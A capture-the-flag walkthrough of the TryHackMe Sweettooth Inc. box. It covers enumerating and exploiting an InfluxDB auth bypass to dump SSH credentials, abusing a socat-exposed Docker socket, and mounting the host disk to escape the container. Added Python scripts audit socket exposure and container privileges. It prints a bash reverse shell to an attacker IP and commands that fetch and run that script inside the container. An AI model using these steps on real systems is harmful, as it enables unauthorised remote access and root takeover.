TryHackMe Sweettooth Inc. Writeup
This writeup will help you solve the Sweettooth Inc. box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file (replace <box_ip> with the IP address of your instance):
echo "<box_ip> sweettooth.thm" >> /etc/hosts
TryHackMe Sweettooth Inc. – Enumeration
As per usual, we start by running a port scan on the host using nmap. The -sC flag runs nmap's default script set against every open port, and the -sV flag probes each port for version information.
nmap -sV -sC sweettooth.thm
You can read the output below:
PORT     STATE SERVICE REASON  VERSION
111/tcp  open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36179/tcp6  status
|   100024  1          42728/tcp   status
|   100024  1          49696/udp   status
|_  100024  1          58848/udp6  status
2222/tcp open  ssh     syn-ack OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
|   1024 b0:ce:c9:21:65:89:94:52:76:48:ce:d8:c8:fc:d4:ec (DSA)
|   2048 7e:86:88:fe:42:4e:94:48:0a:aa:da:ab:34:61:3c:6e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCbBmLBPg9mxkAdEbJGnz0v6Jzo4qdBcajkaIBKewKyz6OQTvyhVcDReSB2Dz0nl4mPCs3UN58hSNStCYXjZcpIBpqz2pHupVlqQ7u41Vo2W8u0nVFLt2U8JhTtA9wE6MA9GhitkN3Qorhxb3klCpSnWCDdcmkdNL0EYxZV53A52VWiNGX3vYkdMAKHAmp/VHvrsIeHozqflL8vD2UIoDmxDJwgXJRsr2iGVU1fL/Bu/DwlPwJkm50ua99yPpZbvCS9EwWki76aEtZSbcM4WHzx33Oe3tLXLCfKc9CJdIW35nBvpe5Dxl7gLR/mCHp2iTpdx1FmpSf+JjO/m2vKwL4X
|   256 04:1c:82:f6:a6:74:53:c9:c4:6f:25:37:4c:bf:8b:a8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHufHfqIZHVEKYC/yyNS+vTt35iULiIWoFNSQP/Bm/v90QzZjsYU9MSt7xdlR/2LZp9VWk32nl5JL65tvCMImxc=
|   256 49:4b:dc:e6:04:07:b6:d5:ab:c0:b0:a3:42:8e:87:b5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJEYHtE8GbpGSlNB+/3IWfYRFrkJB+N9SmKs3Uh14pPj
8086/tcp open  http    syn-ack InfluxDB http admin 1.3.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are 3 open ports. Port 111 serves rpcbind and port 2222 serves SSH. The most interesting port is 8086, which serves a time-series database called InfluxDB (version 1.3.0 according to nmap). Let's try to enumerate this service first.
InfluxDB enumeration
The first task here is to find a valid username. Browsing to http://sweettooth.thm:8086/debug/requests gives it away: this debug endpoint reports recent write and query counts per user and client address. You should see the following JSON-encoded response:
{ "REDACTED:127.0.0.1": {"writes":2,"queries":2} }
Now that we have a username, we should try to access data from the database. When searching for an InfluxDB vulnerability, I stumbled upon the following exploit for CVE-2019-20933, an authentication bypass in InfluxDB versions before 1.7.6 (the box runs 1.3.0). The exploit provides a tool to read data from an InfluxDB database when a username is known. Run the following commands to install the exploit tool:
git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git
cd InfluxDB-Exploit-CVE-2019-20933
python3 -m pip install -r requirements.txt
Now run python3 __main__.py to start the tool. It asks for the IP address and port number of the box and for the username we just found. If you provide everything correctly, you should see the following output:
Databases list:
1) creds
2) docker
3) tanks
4) mixer
5) _internal
You can run use DATABASE_NAME to select a database, and show measurements to list the measurements (InfluxDB's equivalent of tables) of the selected database. In order to find the temperature of the water tank at 1621346400 (UTC Unix timestamp), we need to acquire all data from the tanks database. Run the following commands to do so:
tanks
show measurements
select * from water_tank;
This shows us the water tank readings for a lot of timestamps. Using Epoch Converter, we find that 1621346400 corresponds to the 18th of May 2021 at 14:00 UTC. Now look through the output for the following entry:
[ "2021-05-18T14:00:00Z", 93.47, REDACTED ],
After finding the temperature of the water, we move on to finding the highest RPM the mixer reached. To do so, run the following commands:
exit
mixer
show measurements
select * from mixer_stats
select max(motor_rpm) from mixer_stats
You can see the output below:
"values": [ [ "2021-05-20T15:00:00Z", REDACTED ] ]
TryHackMe Sweettooth Inc. – User Flag
Now on to the real work: let's look for credentials within this database. There was a creds database, so let's check its contents. Run the following commands to view the stored credentials:
exit
creds
show measurements
select * from ssh
You can find the output below:
{
  "results": [
    {
      "series": [
        {
          "columns": [ "time", "pw", "user" ],
          "name": "ssh",
          "values": [
            [ "2021-05-16T12:00:00Z", REDACTED_PASSWORD, "REDACTED_USERNAME" ]
          ]
        }
      ],
      "statement_id": 0
    }
  ]
}
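Every result the tool prints (the water_tank rows, the max(motor_rpm) result and the ssh credentials above) uses InfluxDB 1.x's JSON result layout: results, series, columns and values. The Python script below is an added example, not part of the original writeup or of the exploit tool. It parses that layout into rows, converts the task's Unix timestamp to the RFC 3339 form InfluxDB prints, and answers the "value at a timestamp" and "maximum of a column" questions over a constructed sample response whose numbers are made up and are not the box's values.

```python
"""Parse an InfluxDB 1.x query response and answer the writeup's questions.

Added example for this writeup, not the exploit tool's code; the sample
response below is constructed and does not contain the box's real values."""
import json
from datetime import datetime, timezone

# Constructed sample in the exact shape InfluxDB 1.x uses for query results.
SAMPLE_RESPONSE = json.dumps({
    "results": [{
        "statement_id": 0,
        "series": [{
            "name": "water_tank",
            "columns": ["time", "temperature", "water_level"],
            "values": [
                ["2021-05-18T13:00:00Z", 21.3, 93.47],
                ["2021-05-18T14:00:00Z", 22.1, 93.47],
                ["2021-05-18T15:00:00Z", 23.8, 90.12],
            ],
        }],
    }],
})


def parse_series(raw):
    """Flatten every series in a 1.x response into a list of dict rows."""
    rows = []
    for result in json.loads(raw).get("results", []):
        if "error" in result:  # 1.x reports query errors per statement
            raise ValueError(result["error"])
        for series in result.get("series", []):
            cols = series["columns"]
            for values in series["values"]:
                row = dict(zip(cols, values))
                row["_measurement"] = series["name"]
                rows.append(row)
    return rows


def epoch_to_rfc3339(ts):
    """Turn a Unix timestamp into the RFC 3339 UTC string InfluxDB prints."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def value_at(rows, epoch, column):
    """Return the column value of the row whose time equals the timestamp."""
    wanted = epoch_to_rfc3339(epoch)
    for row in rows:
        if row["time"] == wanted:
            return row[column]
    raise KeyError(f"no row at {wanted}")


def column_max(rows, column):
    """Equivalent of SELECT max(column): (time, value) of the largest entry."""
    best = max(rows, key=lambda r: r[column])
    return best["time"], best[column]


if __name__ == "__main__":
    rows = parse_series(SAMPLE_RESPONSE)
    print(epoch_to_rfc3339(1621346400))            # 2021-05-18T14:00:00Z
    print(value_at(rows, 1621346400, "temperature"))
    print(column_max(rows, "temperature"))
```

Feeding the script the raw JSON saved from a query lets you answer the task questions with a lookup instead of reading through hundreds of rows by eye, and the per-statement error check is where a real client learns that a measurement name was wrong.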
Now you can log into the server using SSH with the credentials from the creds database. To do so, run:
ssh -p 2222 uzJk6Ry98d8C@sweettooth.thm
You can find the user.txt flag in the /home/REDACTED_USER directory.
TryHackMe Sweettooth Inc. – Root Flag
Now that we have found the user.txt flag, let's find the root.txt flag. When running linpeas.sh, I found the interesting file /var/run/docker.sock, which was writable by the current user. Furthermore, when checking all the running processes with ps aux, we can see that socat exposes the Docker socket on port 8080. You can see a small snippet of the ps aux output below:
socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock
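Seen from the defender's side, this socat line is exactly what an audit should catch: the Docker control socket, which gives root-equivalent control of the host, is being republished on a TCP port. The Python script below is an added example (not from the writeup) that scans ps aux output for such forwarders and decides whether a given user can write the socket file. The process list and the file-mode values are constructed; the socat line copies the one above.

```python
"""Audit helper for the Docker control socket: flag processes that republish
/var/run/docker.sock over TCP (as socat does on this box) and decide whether
a given user can write the socket file. Added example, not from the writeup;
the ps output and the stat values below are constructed."""
import re
import stat

SOCKET_PATH = "/var/run/docker.sock"

# Constructed `ps aux` output; the socat line mirrors the one in the writeup.
PS_SAMPLE = """\
USER   PID %CPU %MEM    VSZ   RSS TTY   STAT START TIME COMMAND
root     1  0.0  0.1  15000  1800 ?     Ss   10:00 0:00 /sbin/init
root   412  0.0  0.1   8000  1500 ?     S    10:01 0:00 socat TCP-LISTEN:8080,reuseaddr,fork UNIX-CLIENT:/var/run/docker.sock
root   500  0.1  2.0 900000 40000 ?     Ssl  10:01 0:05 dockerd -H fd:// -H tcp://0.0.0.0:2375
dave   801  0.0  0.1   6000  1200 pts/0 Ss   10:02 0:00 -bash
"""

# Each pattern captures the network listener that exposes the engine API.
EXPOSURE_PATTERNS = [
    re.compile(r"^socat\b.*TCP-LISTEN:(\d+).*" + re.escape(SOCKET_PATH)),
    re.compile(r"^dockerd\b.*-H\s+tcp://([\w.:]+)"),
]


def find_socket_exposures(ps_output):
    """Return (pid, program, listener) for every process exposing the socket."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        fields = line.split(None, 10)        # COMMAND keeps its spaces
        if len(fields) < 11:
            continue
        pid, command = int(fields[1]), fields[10]
        for pattern in EXPOSURE_PATTERNS:
            match = pattern.search(command)
            if match:
                findings.append((pid, command.split()[0], match.group(1)))
    return findings


def user_can_write_socket(mode, owner_uid, group_gid, user_uid, user_gids):
    """Apply the classic Unix permission check to the socket file.
    mode/owner_uid/group_gid are st_mode/st_uid/st_gid as os.stat() gives
    them; any user who can write the socket can drive the Docker engine."""
    if user_uid == 0 or user_uid == owner_uid:
        return True
    if group_gid in user_gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    for pid, program, listener in find_socket_exposures(PS_SAMPLE):
        print(f"pid {pid}: {program} exposes the Docker API on {listener}")
    # Typical default: srw-rw---- root:docker, so only the docker group can write.
    print(user_can_write_socket(0o660, 0, 999, 1000, {1000}))       # False
    print(user_can_write_socket(0o660, 0, 999, 1000, {1000, 999}))  # True
```

On a live host you would feed find_socket_exposures the output of ps aux and user_can_write_socket the fields of os.stat("/var/run/docker.sock") together with the uid and group list of the account under review; either finding means that account, or anyone who can reach the TCP port, effectively has root on the host.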
Now we can use SSH to forward port 8080 to our attacking machine, so we can inspect the Docker API that socat exposes there. You can do so by running the following command on your attacking machine:
ssh -p 2222 uzJk6Ry98d8C@sweettooth.thm -L 8080:localhost:8080
Provide the password of the uzJk6Ry98d8C user. Now we can browse to http://localhost:8080/containers/json to find the container name: sweettoothinc. We can use this container name to execute commands within the docker container. Craft a reverse shell file on your attacking machine containing the following content (replace ATTACKING_IP with your own IP address):
bash -i >& /dev/tcp/ATTACKING_IP/9001 0>&1
Save this file as, for example, obz.sh. On your attacking machine, run python3 -m http.server to start a web server that serves the file on port 8000. In order to catch your reverse shell, run the following command in a new terminal on your attacking machine:
nc -lvnp 9001
You can download and run the file inside the container with the following commands (they assume the file is named shell.sh and that 10.9.5.154 is your attacking machine's IP address):
docker -H localhost:8080 container exec sweettoothinc wget http://10.9.5.154:8000/shell.sh
docker -H localhost:8080 container exec sweettoothinc chmod +x shell.sh
docker -H localhost:8080 container exec sweettoothinc bash -i shell.sh
Go back to your listening netcat terminal, which now holds a shell inside the container, and set the root password by running passwd and entering obz twice when prompted:
passwd
After logging in as the uzJk6Ry98d8C user over SSH, you should now be able to change to the root user by running:
su root
Provide the obz password, and you should now be the root user within the docker container. You can find the root.txt flag at /root/root.txt.
Escape!
The last part of completing this box consists of escaping the docker container. Run the following command to list the disks and partitions visible from inside the container:
fdisk -l
You can see the output below:
Device     Boot    Start      End  Sectors  Size Id Type
/dev/xvda1 *        2048 32088063 32086016 15.3G 83 Linux
/dev/xvda2      32090110 33552383  1462274  714M  5 Extended
/dev/xvda5      32090112 33552383  1462272  714M 82 Linux swap / Solaris
Usually, this should not be visible within a docker container: a container should have no knowledge of the host's disks, and the fact that this one does means it was started with enough privileges to access them. Knowing this, we can try to mount the host's root partition within the docker container. Run the following commands to mount /dev/xvda1 within the Linux docker container:
mkdir /mnt/linux
mount /dev/xvda1 /mnt/linux
Success! You can find the final root.txt flag, which is now located at /mnt/linux/root/root.txt.
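What made the escape possible is the container's own configuration: a container only sees and can mount /dev/xvda1 if it was started with extra privileges. The Python script below is an added example, not from the writeup, that inspects the HostConfig section of a Docker API container description (the shape returned by GET /containers/{id}/json, the same API that /containers/json above comes from) for the settings that make such an escape possible. Both container definitions are constructed: the field names are the Docker API's, the values are invented and are not the box's real configuration.

```python
"""Flag the HostConfig settings that let a process inside a container see and
mount the host's block devices, as happened on this box. Added example, not
from the writeup; both container descriptions are constructed (field names
are the Docker API's, values are invented)."""

# Constructed: a container started with plain defaults.
SAFE_CONTAINER = {
    "Name": "/web",
    "HostConfig": {
        "Privileged": False,
        "Devices": [],
        "CapAdd": None,
        "Binds": ["webdata:/srv"],
        "PidMode": "",
    },
}

# Constructed: the kind of configuration under which `fdisk -l` shows host disks.
RISKY_CONTAINER = {
    "Name": "/sweettooth-like",
    "HostConfig": {
        "Privileged": True,
        "Devices": [{"PathOnHost": "/dev/xvda1",
                     "PathInContainer": "/dev/xvda1",
                     "CgroupPermissions": "rwm"}],
        "CapAdd": ["CAP_SYS_ADMIN"],
        "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "appdata:/data"],
        "PidMode": "host",
    },
}

# Capabilities that are enough to call mount(2) on a mapped-in device.
MOUNT_CAPS = {"SYS_ADMIN", "ALL"}
# Host paths that hand over the host when bind-mounted into a container.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/run/docker.sock",
                        "/dev", "/proc", "/sys"}


def _normalise_cap(name):
    """Docker accepts both SYS_ADMIN and CAP_SYS_ADMIN; compare one form."""
    name = name.upper()
    return name[4:] if name.startswith("CAP_") else name


def escape_risks(container):
    """Return human-readable reasons this container could reach the host."""
    hc = container.get("HostConfig") or {}
    risks = []
    if hc.get("Privileged"):
        risks.append("privileged: every host device is visible and mountable")
    for dev in hc.get("Devices") or []:
        risks.append(f"host device mapped in: {dev.get('PathOnHost')}")
    caps = {_normalise_cap(c) for c in hc.get("CapAdd") or []}
    if caps & MOUNT_CAPS:
        risks.append("added capabilities allow mount(2): "
                     + ", ".join(sorted(caps & MOUNT_CAPS)))
    for bind in hc.get("Binds") or []:
        source = bind.split(":", 1)[0]
        if source in SENSITIVE_HOST_PATHS:
            risks.append(f"sensitive host path bind-mounted: {source}")
    if hc.get("PidMode") == "host":
        risks.append("shares the host PID namespace")
    return risks


if __name__ == "__main__":
    for container in (SAFE_CONTAINER, RISKY_CONTAINER):
        findings = escape_risks(container)
        print(container["Name"], "->", findings or "no escape-enabling settings")
```

Run against the JSON of every container on a host (docker inspect emits the same HostConfig structure), an empty list per container is the state to aim for; any finding is a container that should be treated as part of the host's trust boundary rather than as a sandbox.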
This box was interesting to root. Keep all your software updated to the latest version to prevent exploits like the one used here. Furthermore, if you decide to use docker containers, make sure they are configured securely: most default configurations are already more secure than the ones found in this box.